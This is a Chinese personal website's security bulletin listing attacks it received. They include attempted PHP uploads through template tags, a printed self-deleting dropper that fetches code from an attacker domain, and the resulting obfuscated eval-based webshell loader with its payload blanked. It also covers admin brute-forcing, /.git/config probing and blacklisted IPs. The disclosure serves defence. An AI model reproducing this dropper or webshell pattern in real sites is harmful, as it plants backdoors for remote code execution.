博览晴空安全通报-第一期

这里是博览晴空网站正在遭受的安全攻击,我们将会如实公开,与站长们一起分享。

千万不要被留在这个板块里面哦~

球球各位大佬手下留情,不要再拿小站试了ヽ(≧□≦)ノ

Tips:相关内容被隐去,请勿模仿!


1. 上传PHP文件

2024.3.19~2024.4.11(14天)内共请求552次;User-Agent:Python-urllib/3.12(224次)、Python-urllib/3.7(328次)

使用Pboot 模板引擎模板标签试图下载PHP文件

将请求解码后的PHP文件为

<?php 
file_put_contents('configs.php',file_get_contents(''));
echo 'hs11888';
unlink(__FILE__);

代码下载了一个PHP文件,并且将自身文件删除

请求根域名:hth01.cc

下载后文件为:

<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "";
class x{
    function c($s){
        $a = array($s,"","","");
        evaL($a[mt_rand(0,0)].$a[3]);
    }
}
function s(){
    $str = "";
    $str = str_rot13($str);
    m($str);
}
function m($str=""){
    global $password;
    $pl = pack('H*',$str);
    $zz = new x();
    $zz->c($pl);
}
s();
?>
  • 设置错误报告级别为 E_ERROR,关闭错误显示,设置最大执行时间为 20000 秒,内存限制为 256M。
  • 定义一个名为 x 的类,其中包含一个名为 c 的方法,该方法接受一个参数 str,并使用eval函数执行s,并使用evaL函数执行 s。
  • 定义一个名为 s 的函数,该函数将一个空字符串进行 str_rot13 编码,然后调用 m 函数。
  • 定义一个名为 m 的函数,该函数接受一个参数 str,将 str 转换为十六进制表示的字符串,然后创建一个 x 类的实例,并调用其 c 方法。
  • 调用 s 函数。

2. 多次尝试爆破后台登录

近90天共遭受15317次攻击(其中港澳台14923次)

主要是通过admin的弱密码进行无限次尝试

3. 请求Git配置文件

请求路径:/.git/config

近90天共遭受152次(其中境外16次,大陆地区136次)

config可能含有:

  • 项目的基本信息:包括项目的名称、描述等。
  • 远程仓库信息:包括远程仓库的 URL、分支等。
  • 分支信息:包括本地分支和远程分支的关联关系等。
  • 用户信息:包括用户的姓名、邮箱等。

4. SQL注入等攻击

黑名单:

  • 118.77.144.45 山西省 联通
  • 36.133.43.108 河南省 移动

安全通报板块将会不定期更新

请勿进行非法请求,我们将保留追究攻击者法律责任的权利。

请务必遵守《中华人民共和国个人信息保护法》、《中华人民共和国网络安全法》等相关法律政策。

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇